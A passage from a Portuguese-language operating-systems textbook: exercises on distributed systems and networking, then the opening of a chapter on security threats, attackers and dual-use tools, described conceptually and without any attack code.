sistindo em um cubo 8 x 8 x 8, qual é a largura de banda 
da bissecção se cada link tiver 1 Gbps? 

Considere um multicomputador no qual a interface de 
rede está em modo de usuário, de maneira que apenas 
três cópias são necessárias da RAM fonte para a RAM 
destinatária. Presuma que mover uma palavra de 32 bits 
de ou para a placa de interface de rede leva 20 ns e que a 
própria rede opera a 1 Gbps. Qual seria o atraso para um 
pacote de 64 bytes sendo enviado da fonte para o desti- 
natário se pudéssemos ignorar o tempo de cópia? Qual 
seria o atraso com o tempo de cópia? Agora considere 
o caso em que duas cópias extras são necessárias, para 
o núcleo do lado emissor e do núcleo do lado receptor. 
Qual é o atraso nesse caso? 

Repita o problema anterior tanto para o caso de três có- 
pias, quanto para o caso de cinco cópias, mas dessa vez 
calcule a largura de banda em vez do atraso. 

Ao transferir dados da RAM para uma interface de rede, 
pode-se usar fixar uma página, mas suponha que chama- 
das de sistema para fixar e liberar páginas leva 1 us cada 
uma. A cópia leva 5 bytes/ns usando DMA mas 20 ns 
por byte usando E/S programada. Qual o tamanho que 
o pacote precisa ter para valer a pena prender a página e 
usar o DMA? 

Quando uma rotina é levada de uma máquina e colocada 
em outra para ser chamada pelo RPC, podem ocorrer al- 
guns problemas. No texto, apontamos quatro: ponteiros, 
tamanhos de vetores desconhecidos, tipos de parâmetros 
desconhecidos e variáveis globais. Uma questão não 
discutida é o que acontece se a rotina (remota) execu- 
tar uma chamada de sistema. Quais problemas isso pode 
causar e o que poderia ser feito para trata-los? 

Em um sistema DSM, quando ocorre uma falta de pági- 
na, a página necessária precisa ser localizada. Liste duas 
maneiras possíveis de encontrá-la. 

Considere a alocação de processador da Figura 8.24. Su- 
ponha que o processo H é movido do nó 2 para o nó 3. 
Qual é o peso total do tráfego externo agora? 

Alguns multicomputadores permitem que processos em 
execução migrem de um nó para outro. Parar um pro- 
cesso, congelar sua imagem de memória e simplesmente 
enviar isso para um nó diferente é suficiente? Nomeie 
dois problemas difíceis que precisam ser solucionados 
para fazer isso funcionar. 

Por que há um limite ao comprimento de cabo em uma 
rede Ethernet? 

Na Figura 8.27, a terceira e quarta camadas são rotuladas 
Middleware e Aplicação em todas as quatro máquinas. 
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Em que sentido elas são todas a mesma através das pla- 
taformas, e em que sentido elas são diferentes? 

A Figura 8.30 lista seis tipos diferentes de serviços. Para 
cada uma das aplicações a seguir, qual tipo de serviço é 
o mais apropriado? 

(a) Vídeo por demanda pela internet. 

(b) Baixar uma página da web. 

Nomes DNS têm uma estrutura hierárquica, como sa- 
les.general-widget.com ou cs.uni.edu. Uma maneira de 
manter um banco de dados DNS seria como um banco 
de dados centralizado, mas isso não é feito porque ele re- 
ceberia solicitações demais por segundo. Proponha uma 
maneira que o banco de dados DNS possa ser mantido 
na prática. 

Na discussão de como os URLs são processados por um 
navegador, ficou estabelecido que as conexões são feitas 
para a porta 80. Por quê? 

Máquinas virtuais que migram podem ser mais fáceis do 
que processos que migram, mas a migração ainda assim 
pode ser difícil. Quais problemas podem surgir ao mi- 
grar uma máquina virtual? 

Quando um navegador busca uma página na web, ele 
primeiro faz uma conexão TCP para buscar o texto na 
página (na linguagem HTML). Então ele fecha a cone- 
xão e examina a página. Se houver figuras ou ícones, ele 
então faz uma conexão TCP em separado para buscar 
cada um. Sugira dois projetos alternativos para melhorar 
o desempenho aqui. 

Quando a semântica de sessão é usada, é sempre verda- 
de que mudanças para um arquivo são imediatamente 
visíveis para o processo fazendo a mudança e nunca vi- 
sível para os processos nas outras máquinas. No entan- 
to, trata-se de uma questão aberta se elas devem ou não 
ser imediatamente visíveis a outros processos na mesma 
máquina. Apresente um argumento para cada opção. 
Quando múltiplos processos precisam acessar dados, de 
que maneira o acesso baseado em objetos é melhor do 
que a memória compartilhada? 

Quando uma operação in em Linda é realizada para lo- 
calizar uma tupla, pesquisar o espaço de tuplas inteiro li- 
nearmente é algo muito ineficiente. Projete uma maneira 
de organizar o espaço de tuplas que acelere as pesquisas 
em todas as operações in. 

Copiar buffers leva tempo. Escreva um programa C para 
descobrir quanto tempo leva em um sistema para o qual 
você tem acesso. Use as funções clock ou times para de- 
terminar quanto tempo leva para copiar um grande vetor. 
Teste com diferentes tamanhos de vetores para separar o 
tempo de cópia do tempo de sobrecarga. 

Escreva funções C que possam ser usadas como stubs 
de cliente e servidor para fazer uma chamada RPC para 
a função printf padrão, e um programa principal para 
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testar as funções. O cliente e o servidor devem comu- 
nicar-se por meio de uma estrutura de dados que pode 
ser transmitida por uma rede. Você pode impor limites 
razoáveis sobre o comprimento da cadeia de formato e 
o número, tipos e tamanhos das variáveis que o seu stub 
do cliente aceitará. 

Escreva um programa que implemente os algorit- 
mos de balanceamento de carga iniciados pelo emis- 
sor e iniciados pelo receptor descritos na Seção 8.2. 
Os algoritmos devem tomar como entrada uma lista 
de tarefas recentemente criadas especificadas como 
(creating processor, start time, required CPU time) 
em que o creating processor é o número da CPU que 
criou a tarefa, o start time é o tempo no qual a tarefa 
foi criada e o required CPU time é a quantidade de 
tempo da CPU de que a tarefa precisa para ser com- 
pletada (especificada em segundos). Presuma que um 
nó está sobrecarregado quando ele tem uma tarefa e 
uma segunda tarefa é criada. Presuma que um nó está 
subcarregado quando ele não tem tarefa alguma. Impri- 
ma o número de mensagens de sondagem enviadas por 
ambos os algoritmos sob cargas de trabalho pesadas e 
leves. Também imprima o número máximo e mínimo 
de sondagens enviadas por qualquer hospedeiro e rece- 
bidas por qualquer hospedeiro. Para criar as cargas de 
trabalho, escreva dois geradores de cargas de trabalho. 
O primeiro deve simular uma carga de trabalho pesa- 
da, gerando, na média, N tarefas a cada AJL segundos, 
em que AJL é duração média de tarefa e N é o número 
de processadores. Durações de tarefas podem ser uma 
mistura de tarefas longas e curtas, mas a duração de tra- 
balho médio deve ser AJL. As tarefas devem ser criadas 
(colocadas) aleatoriamente através de todos os proces- 
sadores. O segundo gerador deve simular uma carga 
leve, gerando aleatoriamente N/3 tarefas a cada AJL se- 
gundos. Simule com outras configurações de parâme- 
tros para os geradores de carga de trabalho e veja como 
elas afetam o número de mensagens de sondagem. 
Uma das maneiras mais simples de implementar um 
sistema de publicar/assinar é via um agente que receba 
artigos publicados e os distribua para os assinantes apro- 
priados. Escreva uma aplicação de múltiplos threads que 
emule um sistema publicar/assinar baseado em agente. 
Threads de publicação e assinantes podem comunicar-se 
com o agente por meio de uma memória (compartilha- 
da). Cada mensagem deve começar com um campo de 
comprimento seguido por aquele número de caracteres. 
Threads de publicação enviam mensagens para o agente 
onde a primeira linha da mensagem contém uma linha 
de assunto hierárquico separada por pontos seguida por 
uma ou mais linhas que contenham o artigo publica- 
do. Assinantes enviam uma mensagem para o agente 
com uma única linha contendo uma linha de interesse 
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hierarquica separada por pontos expressando os artigos 
nos quais eles estao interessados. A linha de interesse 
pode conter o símbolo curinga “*”. O agente deve res- 
ponder enviando todos os artigos (passados) que casam 
com o interesse do assinante. Artigos na mensagem são 
separados pela linha “COMEÇAR NOVO ARTIGO”. O 
assinante deve imprimir cada mensagem que ele rece- 
be junto com a identidade do assinante (isto é, sua li- 
nha de interesse). O assinante deve continuar a receber 


quaisquer artigos novos que sejam publicados e casem 
com seu interesse. Threads de publicação e assinantes 
podem ser criados dinamicamente a partir do terminal 
digitando “P” ou “A” (para publicação e assinatura) 
seguidos pela linha de interesse/assunto hierárquica. 
Threads de publicação enviarão então o artigo. Digitar 
uma única linha contendo “.” sinalizará o fim do artigo. 
(Este projeto também pode ser implementado usando 


processos comunicando-se via TCP.) 





uitas empresas possuem informações valiosas 

que querem guardar rigorosamente. Entre tan- 

tas coisas, essa informação pode ser técnica (por 

exemplo, um novo design de chip ou software), 

comercial (como estudos da competição ou pla- 
nos de marketing), financeira (planos para ofertas de 
ações) ou legal (por exemplo, documentos sobre uma 
fusão ou aquisição potencial). A maior parte dessa in- 
formação está armazenada em computadores. Com- 
putadores domésticos cada vez mais guardam dados 
valiosos também. Muitas pessoas mantêm suas infor- 
mações financeiras, incluindo declarações de impostos 
e números do cartão de crédito, no seu computador. 
Cartas de amor tornaram-se digitais. E discos rígi- 
dos hoje em dia estão cheios de fotos, vídeos e filmes 
importantes. 

À medida que mais e mais dessas informações são 
armazenadas em sistemas de computadores, a neces- 
sidade de protegê-los está se tornando cada dia mais 
importante. Portanto, proteger informações contra o 
uso não autorizado é uma preocupação fundamen- 
tal de todos os sistemas operacionais. Infelizmente, 
isso também está se tornando cada dia mais difícil 
por causa da aceitação geral de sistemas inchados (e 
os defeitos de software que o acompanham) como 
um fenômeno normal. Neste capítulo examinaremos 
a segurança de computadores aplicada a sistemas 
operacionais. 

As questões relacionadas à segurança de sistemas 
operacionais mudaram radicalmente nas últimas dé- 
cadas. Até o início da década de 1990, poucas pessoas 
tinham computadores em casa e a maioria da compu- 
tação era feita em empresas, universidades e outras or- 
ganizações em computadores com múltiplos usuários 


que variavam de computadores de grande porte a mini- 
computadores. Quase todas essas máquinas eram iso- 
ladas, sem conexão a rede alguma. Em consequência, 
a segurança era quase inteiramente focada em como 
manter os usuários afastados um do outro. Se Tracy e 
Camille eram usuárias registradas do mesmo computa- 
dor, o truque consistia em certificar-se de que nenhuma 
pudesse ler ou mexer nos arquivos da outra, no entanto 
permitindo que elas compartilhassem aqueles arqui- 
vos que queriam dessa forma. Modelos e mecanismos 
elaborados foram desenvolvidos para certificar-se de 
que nenhum usuário conseguisse direitos de acesso aos 
quais ele não era credenciado. 

Às vezes, os modelos e mecanismos envolviam 
classes de usuários em vez de apenas indivíduos. Por 
exemplo, em um computador militar, dados tinham de 
ser marcados como altamente secretos, secretos, confi- 
denciais, ou públicos, e era preciso impedir que solda- 
dos espionassem nos diretórios de generais, não importa 
quem fosse o soldado ou o general. Todos esses temas 
foram profundamente investigados, relatados e imple- 
mentados ao longo de algumas décadas. 

Uma premissa implícita era a de que, uma vez es- 
colhido e implementado um modelo, o software estaria 
basicamente correto e faria valer quaisquer que fossem 
as regras. Os modelos e softwares eram normalmente 
bastante simples, de maneira que a premissa se man- 
tinha. Desse modo, se teoricamente Tracy não tivesse 
permissão para olhar determinados arquivos de Camille, 
na prática ela realmente não conseguia fazê-lo. 

Com o surgimento do computador pessoal, tablets, 
smartphones e a internet, a situação mudou. Por exem- 
plo, muitos dispositivos têm apenas um usuário, então 
a ameaça de um usuário espiar os arquivos de outro é 
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praticamente nula. E claro, isso nao é verdade em servi- 
dores compartilhados (possivelmente na nuvem). Aqui, 
ha muito interesse em manter os usuarios estritamente 
isolados. Também, a espionagem ainda acontece — na 
rede, por exemplo. Se Tracy está nas mesmas redes de 
Wi-Fi que Camille, ela pode interceptar todos os seus 
dados de rede. Este não é um problema novo. Mais de 
2.000 anos atrás, Júlio César enfrentou a mesma ques- 
tão. César precisava enviar mensagens a suas legiões e 
aliados, mas sempre havia uma chance de a mensagem 
ser interceptada por seus inimigos. A fim de certificar- 
-se de que seus inimigos não seriam capazes de ler os 
seus comandos, César usou a codificação — substituin- 
do cada letra na mensagem pela letra que estava três 
posições à esquerda dela no alfabeto. Então um “D” tor- 
nou-se um “A”, um “E” tornou-se um “B” e assim por 
diante. Embora as técnicas de codificação hoje sejam 
mais sofisticadas, o princípio é o mesmo: sem o conhe- 
cimento da chave, o adversário não deve ser capaz de 
ler a mensagem. 

Infelizmente, isso nem sempre funciona, pois a rede 
não é o único lugar onde Tracy pode espiar Camille. Se 
Tracy for capaz de invadir o computador de Camille, 
ela pode interceptar todas as mensagens enviadas an- 
tes, e todas as mensagens que chegam depois de serem 
codificadas. Invadir o computador de uma pessoa nem 
sempre é fácil, mas é muito mais do que deveria ser (e 
tipicamente muito mais fácil do que desvendar a chave 
de decriptação de 2048 bits de alguém). O problema é 
causado por vírus e afins no software do computador de 
Camille. Felizmente para Tracy, sistemas operacionais 
e aplicações cada dia mais inchados garantem que não 
haja falta de defeitos de software. Quando um defeito 
é de segurança, nós o chamamos de vulnerabilidade. 
Quando Tracy descobre uma vulnerabilidade no soft- 
ware de Camille, ela tem de alimentar aquele software 
com exatamente os bytes certos para desencadear o de- 
feito. Uma entrada que desencadeia um defeito assim 
normalmente é chamada de uma exploração (exploit). 
Muitas vezes, explorações bem-sucedidas permitem que 
os atacantes assumam o controle completo da máquina 
do computador. Colocando a frase de maneira diferente: 
embora Camille possa pensar que é a única usuária no 
computador, ela realmente não está sozinha mesmo! 

Atacantes podem lançar explorações de modo ma- 
nual ou automático, por meio de um vírus ou um worm. 
A diferença entre um vírus e um worm nem sempre é 
muito clara. A maioria das pessoas concorda que um 
vírus precisa pelo menos de alguma interação com o 
usuário para propagar-se. Por exemplo, o usuário pre- 
cisa clicar sobre um anexo para infectar-se. Worms, 


por outro lado, impulsionam a si mesmos. Eles vão 
se propagar, não importa o que o usuário fizer. Tam- 
bém é possível que um usuário instale propositalmente 
o código do atacante. Por exemplo, o atacante pode 
“reempacotar” um software popular, mas caro (como 
um jogo ou um editor de texto) e oferecê-lo de graça 
na internet. Para muitos usuários o termo “de graça” é 
irresistível. No entanto, a instalação do jogo gratuito 
também instala automaticamente uma funcionalidade 
adicional, do tipo que passa o controle do PC e tudo 
o que está dentro dele para um criminoso cibernético 
longe dali. Esse tipo de software é conhecido como 
um “cavalo de Troia”, um assunto que discutiremos 
brevemente. 

Para abordar todos os assuntos, este capítulo tem 
duas partes principais. Ele começa analisando o cam- 
po da segurança detalhadamente. Examinaremos ame- 
aças e atacantes (Seção 9.1), a natureza da segurança 
e dos ataques (Seção 9.2), abordagens diferentes para 
fornecer controle de acesso (Seção 9.3) e modelos de 
segurança (Seção 9.4). Além disso, examinaremos a 
criptografia como uma abordagem fundamental para 
ajudar a fornecer segurança (Seção 9.5), assim como di- 
ferentes maneiras de realizar a autenticação (Seção 9.6). 

Até aqui, tudo bem. Então caímos na realidade. 
As quatro seções a seguir são problemas de seguran- 
ça práticos que ocorrem na vida cotidiana. Falaremos 
sobre os truques que os atacantes usam para assumir 
o controle sobre um sistema de computadores, assim 
como as medidas adotadas em resposta para evitar que 
isso aconteça. Também discutiremos ataques internos 
(insider attacks) e vários tipos de pestes digitais. Con- 
cluímos o capítulo com uma discussão curta a respeito 
de pesquisas em andamento sobre a segurança de com- 
putadores e, por fim, um breve resumo. 

Também é importante observar que embora este li- 
vro seja sobre sistemas operacionais, a segurança de 
sistemas operacionais e a segurança de rede estão tão 
intimamente ligadas que é realmente impossível separá- 
-las. Por exemplo, os vírus vêm pela rede, mas afetam o 
sistema operacional. Como um todo, tendemos a pecar 
pela precaução e incluímos algum material que é perti- 
nente ao assunto, mas não estritamente uma questão de 
sistema operacional. 


9.1 Ambiente de segurança 


Vamos começar nosso estudo de segurança defi- 
nindo alguma terminologia. Algumas pessoas usam 


os termos “segurança” e “proteção” como sinônimos. 


Mesmo assim, muitas vezes é útil fazer uma distinção 
entre os problemas gerais envolvidos em certificar-se 
de que os arquivos não sejam lidos ou modificados por 
pessoas não autorizadas, o que inclui questões técnicas, 
administrativas, legais e políticas, por um lado, e os 
mecanismos do sistema operacional específicos usados 
para fornecer segurança, por outro. Para evitar confu- 
são, usaremos o termo segurança para nos referirmos 
ao problema geral e o termo mecanismos de proteção 
para nos referirmos aos mecanismos específicos do sis- 
tema operacional usados para salvaguardar informações 
no computador. O limite entre eles não é bem defini- 
do, no entanto. Primeiro, examinaremos as ameaças de 
segurança e os atacantes para ver qual é a natureza do 
problema. Posteriormente, examinaremos os mecanis- 
mos e modelos de proteção disponíveis para alcançar a 
segurança. 


9.1.1 Ameaças 


Muitos textos de segurança decompõem a seguran- 
ça de um sistema de informação em três componentes: 
confidencialidade, integridade e disponibilidade. Jun- 
tos, são muitas vezes referidos como “CIA” (confiden- 
tiality, integrity, availability). Eles são mostrados na 
Figura 9.1 e constituem as propriedades de segurança 
fundamentais que devemos proteger contra atacantes e 
bisbilhoteiros — como a (outra) CIA. 

O primeiro, confidencialidade, diz respeito a fazer 
com que dados secretos assim permaneçam. Mais es- 
pecificamente, se o proprietário de algum dado decidiu 
que eles devem ser disponibilizados apenas para deter- 
minadas pessoas e não outras, o sistema deve garantir 
que a liberação de dados para pessoas não autorizadas 
jamais ocorra. Minimamente, o proprietário deve ser 
capaz de especificar quem pode ver o que e o sistema 
tem de assegurar essas especificações, que idealmente 
devem ser por arquivo. 

A segunda propriedade, integridade, significa que 
usuários não autorizados não devem ser capazes de 
modificar dado algum sem a permissão do proprietá- 
rio. A modificação de dados nesse contexto inclui não 
apenas modificar os dados, mas também removê-los e 
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acrescentar dados falsos. Se um sistema não consegue 
garantir que os dados depositados nele permaneçam 
inalterados até que o proprietário decida modificá-los, 
ele não vale muito para o armazenamento de dados. 

Aterceira propriedade, disponibilidade, significa que 
ninguém pode perturbar o sistema para torná-lo inutilizá- 
vel. Tais ataques de recusa de serviço (denial-of-service) 
são cada dia mais comuns. Por exemplo, se um compu- 
tador é um servidor da internet, enviar uma avalanche de 
solicitações para ele pode paralisá-lo ao consumir todo 
seu tempo de CPU apenas examinando e descartando as 
solicitações que chegam. Se levar, digamos, 100 us para 
processar uma solicitação que chega para ler uma página 
da web, então qualquer um que conseguir enviar 10.000 
solicitações/s pode derrubá-lo. Modelos e tecnologias 
razoáveis para lidar com ataques de confidencialidade e 
integridade estão disponíveis, mas derrubar ataques de 
recusa de serviços é bem mais difícil. 

Mais tarde, as pessoas decidiram que três proprie- 
dades fundamentais não eram suficientes para todos os 
cenários possíveis, e assim elas acrescentaram cenários 
adicionais, como a autenticidade, responsabilidade, não 
repudiação, privacidade e outras. Claramente, essas 
propriedades são interessantes de se ter. Mesmo assim, 
as três originais ainda têm um lugar especial no cora- 
ção e mente da maioria dos especialistas (idosos) em 
segurança. 

Sistemas estão sob constante ameaça de atacantes. 
Por exemplo, um atacante pode farejar o tráfego em 
uma rede de área local e violar a confidencialidade da 
informação, especialmente se o protocolo de comunica- 
ção não usar encriptação. Da mesma maneira, um intru- 
so pode atacar um sistema de banco de dados e remover 
ou modificar alguns registros, violando sua integridade. 
Por fim, um ataque de recusa de serviços bem aplicado 
pode destruir a disponibilidade de um ou mais sistemas 
de computadores. 

Há muitas maneiras pelas quais uma pessoa de fora 
pode atacar um sistema; examinaremos algumas delas 
mais adiante neste capítulo. Muitos dos ataques hoje 
são apoiados por ferramentas e serviços altamente 
avançados. Algumas dessas ferramentas são construídas 
pelos chamados hackers de “chapéu preto”, outros pelos 
hackers de “chapéu branco”. Da mesma maneira que nos 
antigos filmes do Velho Oeste, os bandidos no mundo di- 
gital usam chapéus pretos e montam cavalos de Troia — 
os hackers bons usam chapéus brancos e codificam mais 
rápido do que suas sombras. 

A propósito, a imprensa popular tende a usar o ter- 
mo genérico “hacker” exclusivamente para os chapéus 
pretos. No entanto, dentro do mundo dos computadores, 
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“hacker” é um termo de honra reservado para gran- 
des programadores. Embora alguns atuem fora da lei, 
a maioria não o faz. A imprensa entendeu errado essa 
questão. Em deferência aos verdadeiros hackers, usare- 
mos o termo no sentido original e chamaremos as pes- 
soas que tentam invadir sistemas computacionais que 
não lhes dizem respeito de crackers ou chapéus pretos. 

Voltando às ferramentas de ataque, talvez não cause 
surpresa que muitas delas são desenvolvidas por cha- 
péus brancos. A explicação é que, embora os chapéus 
pretos possam utilizá-las (e o fazem) também, essas 
ferramentas servem fundamentalmente como um meio 
conveniente para testar a segurança de um sistema ou 
rede de computadores. Por exemplo, uma ferramenta 
como nmap ajuda os atacantes a determinar os serviços 
de rede oferecidos por um sistema de computadores por 
meio de uma varredura de portas (port-scan). Uma 
das técnicas de varredura mais simples oferecidas pelo 
nmap é testar e estabelecer conexões TCP para toda 
sorte de número de porta possível em um sistema com- 
putacional. Se uma configuração de conexão para uma 
porta for bem-sucedida, deve haver um servidor ouvin- 
do naquela porta. Além disso, tendo em vista que mui- 
tos serviços usam números de portas bem conhecidos, 
isso permite que o testador de segurança (ou atacante) 
descubra em detalhes quais serviços estão executando 
em uma máquina. Colocando a questão de maneira dife- 
rente, nmap é útil para os atacantes assim como para os 
defensores, uma propriedade que é conhecida como uso 
duplo. Outro conjunto de ferramentas, coletivamente 
chamadas de dsniff, oferece uma série de maneiras para 
monitorar o tráfego de rede e redirecionar pacotes de 
rede. O Low Orbit Ion Cannon (LOIC), enquanto isso, 
não é (apenas) uma arma de ficção científica para vapo- 
rizar os inimigos em uma galáxia distante, mas também 
uma ferramenta para lançar ataques de recusa de servi- 
ços. E com o arcabouço Metasploit que vem pré-carre- 
gado com centenas de explorações convenientes contra 
toda sorte de alvos, lançar ataques nunca foi tão fácil. 
Claramente, todas essas ferramentas têm características 
de uso duplo. Assim como facas e machados, isso não 
quer dizer que sejam más per se. 

No entanto, criminosos cibernéticos também ofere- 
cem uma ampla gama de serviços (muitas vezes on-line) para 
“chefões” cibernéticos a fim de disseminar malwares, 
lavar dinheiro, redirecionar tráfego, fornecer hospeda- 
gem com uma política de não fazer perguntas, e muitas 
outras coisas úteis. A maioria das atividades crimino- 
sas na internet cresceu sobre infraestruturas conhecidas 
como botnets que consistem em milhares (e às vezes 
milhões) de computadores comprometidos — muitas 


vezes computadores normais de usuários inocentes e 
ignorantes. Há uma variedade enorme de maneiras pe- 
las quais atacantes podem comprometer a máquina de 
um usuário. Por exemplo, eles podem oferecer versões 
gratuitas, mas contaminadas, de um software popular. 
A triste verdade é que a promessa de versões gratuitas 
sem licença de softwares caros é irresistível para muitos 
usuários. Infelizmente, a instalação desses programas 
proporciona ao atacante o acesso completo à máquina. 
É como passar a chave de sua casa para um perfeito 
estranho. Quando o computador está sob o controle do 
atacante, ele é conhecido com um bot ou zumbi. Ti- 
picamente, nada disso é visível para o usuário. Hoje, 
botnets consistindo em centenas ou milhares de zumbis 
são os burros de carga de muitas atividades criminosas. 
Algumas centenas de milhares de PCs representam um 
número enorme de máquinas para furtar detalhes bancá- 
rios, ou usá-los para spam, e pense apenas na destruição 
que pode ocorrer quando um milhão de zumbis apontam 
suas armas LOIC para um alvo que não está esperando 
por isso. 

Às vezes, os efeitos do ataque vão bem além dos pró- 
prios sistemas computacionais e atingem diretamente o 
mundo físico. Um exemplo é o ataque sobre o sistema 
de tratamento de esgoto de Maroochy Shire, em Queens- 
land, Austrália — não muito distante de Brisbane. Um 
ex-empregado insatisfeito de uma empresa de tratamento 
de esgoto não gostou quando a prefeitura de Maroochy 
Shire recusou o seu pedido de emprego e decidiu dar o 
troco. Ele assumiu o controle do sistema e provocou um 
derramamento de milhões de litros de esgoto não tratado 
nos parques, rios e águas costeiras (onde os peixes mor- 
reram prontamente) — assim como em outros lugares. 

De maneira mais geral, existem pessoas mundo afora 
indignadas com algum país ou grupo (étnico) em particu- 
lar — ou apenas irritadas com a situação das coisas — 
e que desejam destruir a maior quantidade de infraestru- 
tura possível sem levar muito em consideração a natureza 
do dano ou quem serão as vítimas específicas. Em geral, 
essas pessoas acham que atacar os computadores de seus 
inimigos é algo bom, mas os ataques em si podem não ser 
muito precisos. 

No extremo oposto há a guerra cibernética. Uma 
arma cibernética comumente referida como Stuxnet da- 
nificou fisicamente as centrifugas em uma instalação de 
enriquecimento de urânio em Natanz, Irã, e diz-se que 
ela causou um retardamento significativo no programa 
nuclear iraniano. Embora ninguém tenha se apresentado 
para reivindicar o crédito por esse ataque, algo tão sofis- 
ticado provavelmente originou-se nos serviços secretos 
de um ou mais países hostis ao Irã. 


Um aspecto importante do problema de segurança, 
relacionado com a confidencialidade, é a privacidade: 
proteger indivíduos do uso equivocado de informações a 
seu respeito. Isso rapidamente entra em muitas questões 
legais e morais. O governo deve compilar dossiês sobre 
todos a fim de pegar sonegadores de X, onde X pode 
ser “previdência social” ou “taxas”, dependendo da sua 
política? A polícia deve ter acesso a qualquer coisa e a 
qualquer um a fim de deter o crime organizado? E o que 
dizer da Agência de Segurança Nacional norte-americana 
monitorando milhões de telefones celulares diariamente 
na esperança de pegar potenciais terroristas? Empregado- 
res e companhias de seguro têm direitos? O que acontece 
quando esses direitos entram em conflito com os direitos 
individuais? Todas essas questões são extremamente im- 
portantes mas estão além do escopo deste livro. 


9.1.2 Atacantes 


A maioria das pessoas é gentil e obedece à lei, então 
por que nos preocuparmos com a segurança? Porque in- 
felizmente existem algumas pessoas por aí que não são 
tão gentis e querem causar problemas (possivelmente 
para o seu próprio ganho pessoal). Na literatura de se- 
gurança, pessoas que se intrometem em lugares que não 
lhes dizem respeito são chamadas de atacantes, intru- 
sas, ou às vezes adversárias. Algumas décadas atrás, 
invadir sistemas computacionais era algo que se fazia 
para se exibir para os amigos, para mostrar como você 
era esperto, mas hoje em dia essa não é mais a única ou 
mesmo a razão mais importante para invadir um siste- 
ma. Há muitos tipos diferentes de atacantes com tipos 
diferentes de motivações: roubo, ativismo cibernéti- 
co, vandalismo, terrorismo, guerra cibernética, espio- 
nagem, spam, extorsão, fraude — e ocasionalmente o 
atacante ainda quer simplesmente se exibir, ou expor a 
fragilidade da segurança de uma organização. 

Atacantes similarmente variam de aspirantes a cha- 
péus pretos não muito habilidosos, também conhecidos 
como script-kiddies (literalmente, crianças que seguem 
roteiros), a crackers extremamente habilidosos. Eles po- 
dem ser profissionais trabalhando para criminosos, go- 
vernos (por exemplo, a polícia, o exército, ou os serviços 
secretos), ou empresas de segurança — ou pessoas que o 
fazem como um passatempo em seu tempo livre. Deve 
ficar claro que tentar evitar que um governo estrangeiro 
hostil roube segredos militares é algo inteiramente dife- 
rente de tentar evitar que estudantes insiram uma piada 
do dia no sistema. O montante de esforço necessário para 
a segurança e proteção claramente depende de quem 
achamos que seja o inimigo. 


Capítulo 9 SEGURANÇA | 415) 


9.2 Segurança de sistemas operacionais 


Existem muitas maneiras de comprometer a seguran- 
ça de um sistema computacional. Muitas vezes elas não 
são nem um pouco sofisticadas. Por exemplo, muitas 
pessoas configuram seus códigos PIN para 0000, ou sua 
senha para “senha”? — fácil de lembrar, mas não muito 
seguro. Há também pessoas que fazem o contrário. Elas 
escolhem senhas muito complicadas, e assim acabam 
não conseguindo lembrá-las, e precisam escrevê-las 
em uma nota que é então colada no monitor ou teclado. 
Dessa maneira, qualquer um com acesso físico à máqui- 
na (incluindo o pessoal de limpeza, a secretária e todos 
os visitantes) também tem acesso a tudo o que está na 
máquina. Há muitos outros exemplos, e eles incluem 
altos dirigentes perdendo pen-drives com informações 
sensíveis, velhos discos rígidos com segredos de indús- 
trias que não são apropriadamente apagados antes de 
serem jogados no lixo reciclável, e assim por diante. 

Mesmo assim, alguns dos incidentes de segurança 
mais importantes ocorrem por causa de ataques ciberné- 
ticos sofisticados. Neste livro, estamos especificamente 
interessados em ataques relacionados ao sistema opera- 
cional. Em outras palavras, não examinaremos ataques 
na web, ou ataques em bancos de dados SQL. Em vez 
disso, nos concentraremos onde o sistema operacional 
é alvo do ataque ou tem um papel importante em fazer 
valer (ou mais comumente, falhar em fazer valer) as po- 
líticas de segurança. 

Em geral, distinguimos entre ataques que tentam 
roubar informações passivamente e ataques que tentam 
ativamente fazer com que um programa de computador 
comporte-se mal. Um exemplo de um ataque passivo é 
um adversário que fareja o tráfego de rede e tenta violar 
a codificação (se houver alguma) para conseguir os da- 
dos. Em um ataque ativo, o intruso pode assumir o con- 
trole do navegador da web de um usuário para fazê-lo 
executar um código malicioso, a fim de roubar detalhes 
do cartão de crédito, por exemplo. No mesmo sentido, 
fazemos uma distinção entre a criptografia, que diz 
respeito a embaralhar uma mensagem ou arquivo de tal 
maneira que fique difícil de recuperar os dados originais 
a não ser que você tenha a chave, e endurecimento de 
software, que acrescenta mecanismos de proteção a pro- 
gramas a fim de dificultar a ação de atacantes que bus- 
cam fazê-los comportar-se inadequadamente. O sistema 
operacional usa a criptografia em muitos lugares: para 
transmitir dados com segurança através da rede, arma- 
zenar arquivos com segurança em disco, embaralhar as 
senhas em um arquivo de senhas etc. O endurecimento 
de programa também é usado por toda parte: para evitar 
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que atacantes injetem códigos novos em softwares em 
execução, certificar-se de que cada processo tem exata- 
mente os privilégios de que ele precisa para fazer o que 
deve fazer e nada mais etc. 


9.2.1 Temos condições de construir sistemas 
seguros? 


Hoje é difícil abrir um jornal sem ler mais uma his- 
tória sobre atacantes violando sistemas computacionais, 
roubando informações, ou controlando milhões de com- 
putadores. Uma pessoa ingênua pode fazer logicamente 
duas perguntas em relação a essa situação: 


1. E possível construir um sistema computacional 
seguro? 
2. Se afirmativo, por que isso não é feito? 


Aresposta para a primeira pergunta é: “Nateoria, sim”. 
Em princípio, softwares podem ser livres de defeitos e 
podemos até nos certificar de que sejam seguros — des- 
de que o software não seja grande demais ou complica- 
do. Infelizmente, sistemas de computadores são de uma 
complicação tremenda hoje em dia, e isso tem muito a 
ver com a segunda pergunta. A segunda pergunta, por que 
sistemas seguros não estão sendo construídos, diz respei- 
to a duas razões fundamentais. Primeiro, os sistemas atu- 
ais não são seguros, mas os usuários não estão dispostos 
a jogá-los fora. Se a Microsoft fosse anunciar que além 
do Windows ela tinha um novo produto, SecureOS, que 
era resistente a vírus, mas não executava aplicações do 
Windows, não há a menor chance de que as pessoas e as 
empresas jogariam o Windows pela janela e comprariam 
o novo sistema imediatamente. Na realidade, a Microsoft 
tem um SO seguro (FANDRICH et al., 2006), mas não o 
está comercializando. 

A segunda questão é muito mais sutil. A única maneira 
segura de construir um sistema seguro é mantê-lo simples. 
Funcionalidades são o inimigo da segurança. A boa gente 
do Departamento de Marketing na maioria das empresas 
de tecnologia acredita (de modo acertado ou equivocado) 
que os usuários querem é mais funcionalidades, maiores e 
melhores. Eles se certificam de que os arquitetos do siste- 
ma que estão projetando os seus produtos recebam a men- 
sagem. No entanto, tudo isso significa mais complexidade, 
mais códigos, mais defeitos e mais erros de segurança. 

A seguir, dois exemplos relativamente simples: os 
primeiros sistemas de e-mail enviavam mensagens 
como texto ASCII. Elas eram simples e podiam ser fei- 
tas de maneira relativamente segura. À não ser que exis- 
